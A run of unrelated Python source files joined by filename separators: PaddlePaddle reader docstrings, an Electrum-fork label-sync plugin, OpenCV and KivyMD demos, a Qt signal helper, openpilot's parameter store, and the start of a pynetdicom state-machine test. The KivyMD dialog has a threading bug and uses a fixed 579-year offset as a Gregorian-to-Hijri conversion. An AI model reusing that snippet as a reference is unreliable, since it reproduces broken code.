reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
labels.py | import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
from electrum_civx.plugin import BasePlugin, hook
from electrum_civx.crypto import aes_encrypt_with_iv, aes_decrypt_with_iv
from electrum_civx.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.electrum.org'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if wallet not in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request_safe,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise Exception(response.status_code, response.text)
response = response.json()
if "error" in response:
raise Exception(response["error"])
return response
def do_request_safe(self, *args, **kwargs):
try:
self.do_request(*args, **kwargs)
except BaseException as e:
#traceback.print_exc(file=sys.stderr)
self.print_error('error doing request')
def push_thread(self, wallet):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
def pull_thread_safe(self, wallet, force):
try:
self.pull_thread(wallet, force)
except BaseException as e:
# traceback.print_exc(file=sys.stderr)
self.print_error('could not retrieve labels')
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread_safe, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
thread.py | #!/usr/bin/env python
import cv2 as cv
from threading import Thread
import time
from umucv.util import putText
from umucv.stream import autoStream
def work(img):
r = img
for _ in range(10):
r = cv.medianBlur(r,17)
return r
frame = None
goon = True
def fun():
global frame, goon, key
for key,frame in autoStream():
cv.imshow('cam',frame)
goon = False
t = Thread(target=fun,args=())
t.start()
while frame is None: pass
while goon:
t0 = time.time()
result = work(frame)
t1 = time.time()
putText(result, '{:.0f}ms'.format(1000*(t1-t0)))
cv.imshow('work', result)
|
YearDialog.py | from kivymd.uix.dialog import MDDialog
from kivymd.uix.button import MDFlatButton
from kivymd.uix.screen import MDScreen
from kivymd.uix.list import OneLineListItem
from kivymd.app import MDApp
from kivy.uix.recycleview import RecycleView
from kivy.lang import Builder
kv = """
#:import Thread threading.Thread
<CustomRecycle>:
id: crv
key_viewclass: 'viewclass'
key_size: "height"
RecycleBoxLayout:
id: rbl
padding: "10dp"
default_size: None, dp(48)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: "vertical"
<YearItem>:
on_release:
content = root.parent.parent.parent
content.gyear = self.text.split('/')[0]
thread = Thread(target=app.cal.on_year_change(content.gyear), args=(1,))
thread.start()
app.yeardialog.dismiss()
"""
class YearItem(OneLineListItem):
pass
class YearContent(MDScreen):
def build(self):
self.name = "Year"
self.year = None
return Builder.load_string(kv)
def create(self):
self.build()
recycle = CustomRecycle()
recycle.size_hint_y = None
recycle.height = 300
for i in range(1990, 2071):
islamic = i - 579
item = {
"viewclass": "YearItem",
"text": f"{str(i)}/{str(islamic)}",
}
recycle.data.append(item)
return recycle
class CustomRecycle(RecycleView):
pass
class Example(MDApp):
def build(self):
self.content = YearContent(size_hint_y=None, height=400).create()
self.dialog = MDDialog(
title="Choose Year:",
type="custom",
content_cls=self.content
)
screen = MDScreen()
button = MDFlatButton(text="Click Me", on_release=self.open_dialog)
screen.add_widget(button)
return screen
def open_dialog(self, instance):
self.dialog.open()
if __name__ == '__main__':
Example().run() |
QtExecuteSignal.py | ##############################################################################
# #
# Copyright (C) 2017, goatpig #
# Distributed under the MIT license #
# See LICENSE-MIT or https://opensource.org/licenses/MIT #
# #
##############################################################################
from PyQt4.QtCore import SIGNAL
from threading import Thread
from time import sleep
##############################################################################
class QtExecuteSignal(object):
###########################################################################
def __init__(self, mainWnd):
self.mainWnd = mainWnd
self.mainWnd.connect(\
self.mainWnd, SIGNAL("executeSignal"), self.methodSlot)
self.waiting = {}
###########################################################################
def executeMethod(self, _callable, *args):
self.mainWnd.emit(SIGNAL("executeSignal"), _callable, *args)
###########################################################################
def methodSlot(self, _callable, *args):
_callable(*args)
###########################################################################
def callLater(self, delay, _callable, *_args):
#if a given method is already waiting on delayed execution, update the
#args and return
if _callable in self.waiting:
self.waiting[_callable] = _args
return
self.waiting[_callable] = _args
thr = Thread(target=self.callLaterThread, args=(delay, _callable) + _args)
thr.start()
###########################################################################
def callLaterThread(self, delay, _callable, *args):
sleep(delay)
self.waiting.pop(_callable, None)
self.executeMethod(_callable, *args) |
params.py | #!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import string
import binascii
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
#dragonpilot config
"DragonEnableDashcam": [TxType.PERSISTENT],
"DragonEnableAutoShutdown": [TxType.PERSISTENT],
"DragonAutoShutdownAt": [TxType.PERSISTENT],
"DragonEnableSteeringOnSignal": [TxType.PERSISTENT],
"DragonEnableLogger": [TxType.PERSISTENT],
"DragonEnableUploader": [TxType.PERSISTENT],
"DragonNoctuaMode": [TxType.PERSISTENT],
"DragonCacheCar": [TxType.PERSISTENT],
"DragonCachedModel": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedFP": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedVIN": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedCarFW": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonCachedSource": [TxType.CLEAR_ON_MANAGER_START], # deprecated
"DragonAllowGas": [TxType.PERSISTENT],
"DragonToyotaStockDSU": [TxType.PERSISTENT],
"DragonLatCtrl": [TxType.PERSISTENT],
"DragonUISpeed": [TxType.PERSISTENT],
"DragonUIEvent": [TxType.PERSISTENT],
"DragonUIMaxSpeed": [TxType.PERSISTENT],
"DragonUIFace": [TxType.PERSISTENT],
"DragonUIDev": [TxType.PERSISTENT],
"DragonUIDevMini": [TxType.PERSISTENT],
"DragonEnableTomTom": [TxType.PERSISTENT],
"DragonBootTomTom": [TxType.PERSISTENT],
"DragonRunTomTom": [TxType.PERSISTENT],
"DragonEnableAutonavi": [TxType.PERSISTENT],
"DragonBootAutonavi": [TxType.PERSISTENT],
"DragonRunAutonavi": [TxType.PERSISTENT],
"DragonEnableAegis": [TxType.PERSISTENT],
"DragonBootAegis": [TxType.PERSISTENT],
"DragonRunAegis": [TxType.PERSISTENT],
"DragonEnableMixplorer": [TxType.PERSISTENT],
"DragonRunMixplorer": [TxType.PERSISTENT],
"DragonSteeringMonitorTimer": [TxType.PERSISTENT],
"DragonCameraOffset": [TxType.PERSISTENT],
"DragonUIVolumeBoost": [TxType.PERSISTENT],
"DragonGreyPandaMode": [TxType.PERSISTENT],
"DragonDrivingUI": [TxType.PERSISTENT],
"DragonDisplaySteeringLimitAlert": [TxType.PERSISTENT],
"DragonChargingCtrl": [TxType.PERSISTENT],
"DragonCharging": [TxType.PERSISTENT],
"DragonDisCharging": [TxType.PERSISTENT],
"DragonToyotaLaneDepartureWarning": [TxType.PERSISTENT],
"DragonUILane": [TxType.PERSISTENT],
"DragonUILead": [TxType.PERSISTENT],
"DragonUIPath": [TxType.PERSISTENT],
"DragonUIBlinker": [TxType.PERSISTENT],
"DragonUIDMView": [TxType.PERSISTENT],
"DragonEnableDriverMonitoring": [TxType.PERSISTENT],
"DragonCarModel": [TxType.CLEAR_ON_MANAGER_START],
"DragonEnableSlowOnCurve": [TxType.PERSISTENT],
"DragonEnableLeadCarMovingAlert": [TxType.PERSISTENT],
"DragonToyotaSnGMod": [TxType.PERSISTENT],
"DragonWazeMode": [TxType.PERSISTENT],
"DragonRunWaze": [TxType.PERSISTENT],
"DragonEnableAutoLC": [TxType.PERSISTENT],
"DragonAssistedLCMinMPH": [TxType.PERSISTENT],
"DragonAutoLCMinMPH": [TxType.PERSISTENT],
"DragonAutoLCDelay": [TxType.PERSISTENT],
"DragonBTG": [TxType.PERSISTENT],
"DragonBootHotspot": [TxType.PERSISTENT],
"DragonAccelProfile": [TxType.PERSISTENT],
"DragonLastModified": [TxType.CLEAR_ON_MANAGER_START],
"DragonEnableRegistration": [TxType.PERSISTENT],
"DragonDynamicFollow": [TxType.PERSISTENT],
"DragonToyotaSngResponse": [TxType.PERSISTENT],
"DragonEnableGearCheck": [TxType.PERSISTENT],
"DragonEnableTempMonitor": [TxType.PERSISTENT],
"DragonAppAutoUpdate": [TxType.PERSISTENT],
"DragonUpdating": [TxType.CLEAR_ON_MANAGER_START],
"DragonCustomModel": [TxType.PERSISTENT],
"DragonSupportedCars": [TxType.PERSISTENT],
"DragonLocale": [TxType.PERSISTENT],
"DragonUIScreenOffReversing": [TxType.PERSISTENT],
"DragonEnableSRLearner": [TxType.PERSISTENT],
"DragonEnableSteerBoost": [TxType.PERSISTENT],
"DragonSteerBoostMin": [TxType.PERSISTENT],
"DragonSteerBoostMax": [TxType.PERSISTENT],
"DragonSteerBoostMinAt": [TxType.PERSISTENT],
"DragonSteerBoostMaxAt": [TxType.PERSISTENT],
"DragonDashcamHours": [TxType.PERSISTENT],
"DragonUIScreenOffDriving": [TxType.PERSISTENT],
"DragonEnableAutoUpdate": [TxType.PERSISTENT],
"DragonUIBrightness": [TxType.PERSISTENT],
"DragonDashcamImpactDetect": [TxType.PERSISTENT],
"AndrewSteerRateCost": [TxType.PERSISTENT],
"AndrewSteerLimitTimer": [TxType.PERSISTENT],
"AndrewINDIInnerLoopGain": [TxType.PERSISTENT],
"AndrewINDIOuterLoopGain": [TxType.PERSISTENT],
"AndrewINDIActuatorEffectiveness": [TxType.PERSISTENT],
"AndrewINDITimeConstant": [TxType.PERSISTENT],
"AndrewSteerActuatorDelay": [TxType.PERSISTENT],
"AndrewTryLQR": [TxType.PERSISTENT],
"DragonDashcamImpactDetectStarted": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, type, value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path+"/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db+"/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
if __name__ == "__main__":
params = Params()
if len(sys.argv) > 2:
params.put(sys.argv[1], sys.argv[2])
else:
for k in keys:
pp = params.get(k)
if pp is None:
print("%s is None" % k)
elif all(chr(c) in string.printable for c in pp):
print("%s = %s" % (k, pp))
else:
print("%s = %s" % (k, binascii.hexlify(pp)))
# Test multiprocess:
# seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
# while python common/params.py DongleId; do sleep 0.05; done
|
test_fsm.py | """Unit tests for fsm.py"""
import datetime
import logging
import socket
from struct import pack
import threading
import time
import pytest
from pynetdicom import AE, build_context, evt, debug_logger
from pynetdicom.association import Association
from pynetdicom import fsm as FINITE_STATE
from pynetdicom.fsm import *
from pynetdicom.dimse_primitives import C_ECHO
from pynetdicom.pdu_primitives import (
A_ASSOCIATE,
A_ABORT,
A_P_ABORT,
P_DATA,
A_RELEASE,
MaximumLengthNotification,
ImplementationClassUIDNotification,
)
from pynetdicom.sop_class import Verification
from pynetdicom.transport import AssociationSocket
from .encoded_pdu_items import (
a_associate_ac,
a_associate_rq,
a_associate_rj,
p_data_tf,
a_abort,
a_release_rq,
a_release_rp,
)
from .parrot import ThreadedParrot
# debug_logger()
REFERENCE_BAD_EVENTS = [
# Event, bad states
("Evt1", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rq) p
("Evt2", [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection available
("Evt3", [1, 4]), # A-ASSOCIATE-AC PDU recv
("Evt4", [1, 4]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection open
("Evt6", [1, 4]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (ac) p
("Evt8", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rj) p
("Evt9", [1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13]), # P-DATA primitive
("Evt10", [1, 4]), # P-DATA-TF PDU
